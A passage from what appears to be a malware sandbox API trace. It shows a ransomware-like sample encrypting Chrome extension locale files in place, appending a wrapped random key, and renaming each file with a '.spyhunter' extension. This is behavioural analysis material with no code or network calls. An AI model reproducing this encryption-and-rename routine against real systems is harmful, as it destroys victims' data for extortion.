data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.spyhunter")) returned 1 [0137.271] GetProcessHeap () returned 0x2c0000 [0137.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.271] GetProcessHeap () returned 0x2c0000 [0137.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.271] GetProcessHeap () returned 0x2c0000 [0137.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc74d0 | out: hHeap=0x2c0000) returned 1 [0137.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f490 | out: pbBuffer=0x57f490) returned 1 [0137.272] GetProcessHeap () returned 0x2c0000 [0137.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f488*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f488*=0x30) returned 1 [0137.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0137.273] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.273] GetProcessHeap () returned 0x2c0000 [0137.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.273] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f44c*=0xac, lpOverlapped=0x0) returned 1 [0137.274] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.274] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x57f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f44c*=0xac, lpOverlapped=0x0) returned 1 [0137.274] GetProcessHeap () returned 0x2c0000 [0137.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.275] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.275] WriteFile (in: hFile=0x18c, lpBuffer=0x57f48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f44c, lpOverlapped=0x0 | out: lpBuffer=0x57f48c*, lpNumberOfBytesWritten=0x57f44c*=0x4, lpOverlapped=0x0) returned 1 [0137.275] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f44c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f44c*=0x30, lpOverlapped=0x0) returned 1 [0137.275] CloseHandle (hObject=0x18c) returned 1 [0137.275] GetProcessHeap () returned 0x2c0000 [0137.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.275] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.spyhunter") returned 165 [0137.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.spyhunter")) returned 1 [0137.276] GetProcessHeap () returned 0x2c0000 [0137.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.276] GetProcessHeap () returned 0x2c0000 [0137.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.276] GetProcessHeap () returned 0x2c0000 [0137.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07810 | out: hHeap=0x2c0000) returned 1 [0137.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f488 | out: pbBuffer=0x57f488) returned 1 [0137.278] GetProcessHeap () returned 0x2c0000 [0137.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.278] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f480*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f480*=0x30) returned 1 [0137.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0137.279] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.279] GetProcessHeap () returned 0x2c0000 [0137.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.279] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f444, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f444*=0xd2, lpOverlapped=0x0) returned 1 [0137.280] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.280] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x57f444, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f444*=0xd2, lpOverlapped=0x0) returned 1 [0137.280] GetProcessHeap () returned 0x2c0000 [0137.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.280] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.280] WriteFile (in: hFile=0x18c, lpBuffer=0x57f484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f444, lpOverlapped=0x0 | out: lpBuffer=0x57f484*, lpNumberOfBytesWritten=0x57f444*=0x4, lpOverlapped=0x0) returned 1 [0137.280] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f444, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f444*=0x30, lpOverlapped=0x0) returned 1 [0137.280] CloseHandle (hObject=0x18c) returned 1 [0137.280] GetProcessHeap () returned 0x2c0000 [0137.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.280] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.spyhunter") returned 168 [0137.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.spyhunter")) returned 1 [0137.281] GetProcessHeap () returned 0x2c0000 [0137.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.281] GetProcessHeap () returned 0x2c0000 [0137.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.281] GetProcessHeap () returned 0x2c0000 [0137.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07688 | out: hHeap=0x2c0000) returned 1 [0137.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f480 | out: pbBuffer=0x57f480) returned 1 [0137.282] GetProcessHeap () returned 0x2c0000 [0137.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f478*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f478*=0x30) returned 1 [0137.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0137.283] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.283] GetProcessHeap () returned 0x2c0000 [0137.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.283] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f43c*=0xbb, lpOverlapped=0x0) returned 1 [0137.284] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.284] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x57f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f43c*=0xbb, lpOverlapped=0x0) returned 1 [0137.284] GetProcessHeap () returned 0x2c0000 [0137.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.284] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.284] WriteFile (in: hFile=0x18c, lpBuffer=0x57f47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f43c, lpOverlapped=0x0 | out: lpBuffer=0x57f47c*, lpNumberOfBytesWritten=0x57f43c*=0x4, lpOverlapped=0x0) returned 1 [0137.284] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f43c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f43c*=0x30, lpOverlapped=0x0) returned 1 [0137.284] CloseHandle (hObject=0x18c) returned 1 [0137.285] GetProcessHeap () returned 0x2c0000 [0137.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.285] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.spyhunter") returned 165 [0137.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0137.285] GetProcessHeap () returned 0x2c0000 [0137.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.285] GetProcessHeap () returned 0x2c0000 [0137.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.285] GetProcessHeap () returned 0x2c0000 [0137.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07378 | out: hHeap=0x2c0000) returned 1 [0137.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f478 | out: pbBuffer=0x57f478) returned 1 [0137.287] GetProcessHeap () returned 0x2c0000 [0137.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f470*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f470*=0x30) returned 1 [0137.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0137.287] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.287] GetProcessHeap () returned 0x2c0000 [0137.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.287] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f434, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f434*=0xc7, lpOverlapped=0x0) returned 1 [0137.288] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.288] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x57f434, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f434*=0xc7, lpOverlapped=0x0) returned 1 [0137.289] GetProcessHeap () returned 0x2c0000 [0137.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.289] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.289] WriteFile (in: hFile=0x18c, lpBuffer=0x57f474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f434, lpOverlapped=0x0 | out: lpBuffer=0x57f474*, lpNumberOfBytesWritten=0x57f434*=0x4, lpOverlapped=0x0) returned 1 [0137.289] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f434, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f434*=0x30, lpOverlapped=0x0) returned 1 [0137.289] CloseHandle (hObject=0x18c) returned 1 [0137.289] GetProcessHeap () returned 0x2c0000 [0137.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.289] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.spyhunter") returned 166 [0137.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0137.290] GetProcessHeap () returned 0x2c0000 [0137.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.290] GetProcessHeap () returned 0x2c0000 [0137.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.290] GetProcessHeap () returned 0x2c0000 [0137.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07068 | out: hHeap=0x2c0000) returned 1 [0137.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f470 | out: pbBuffer=0x57f470) returned 1 [0137.291] GetProcessHeap () returned 0x2c0000 [0137.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f468*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f468*=0x30) returned 1 [0137.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0137.292] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.292] GetProcessHeap () returned 0x2c0000 [0137.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.292] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f42c*=0xb7, lpOverlapped=0x0) returned 1 [0137.293] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.293] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x57f42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f42c*=0xb7, lpOverlapped=0x0) returned 1 [0137.293] GetProcessHeap () returned 0x2c0000 [0137.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.293] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.294] WriteFile (in: hFile=0x18c, lpBuffer=0x57f46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f42c, lpOverlapped=0x0 | out: lpBuffer=0x57f46c*, lpNumberOfBytesWritten=0x57f42c*=0x4, lpOverlapped=0x0) returned 1 [0137.294] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f42c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f42c*=0x30, lpOverlapped=0x0) returned 1 [0137.294] CloseHandle (hObject=0x18c) returned 1 [0137.294] GetProcessHeap () returned 0x2c0000 [0137.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.294] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.spyhunter") returned 165 [0137.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0137.295] GetProcessHeap () returned 0x2c0000 [0137.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.295] GetProcessHeap () returned 0x2c0000 [0137.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.295] GetProcessHeap () returned 0x2c0000 [0137.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06d58 | out: hHeap=0x2c0000) returned 1 [0137.296] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f468 | out: pbBuffer=0x57f468) returned 1 [0137.296] GetProcessHeap () returned 0x2c0000 [0137.296] RtlAllocateHeap 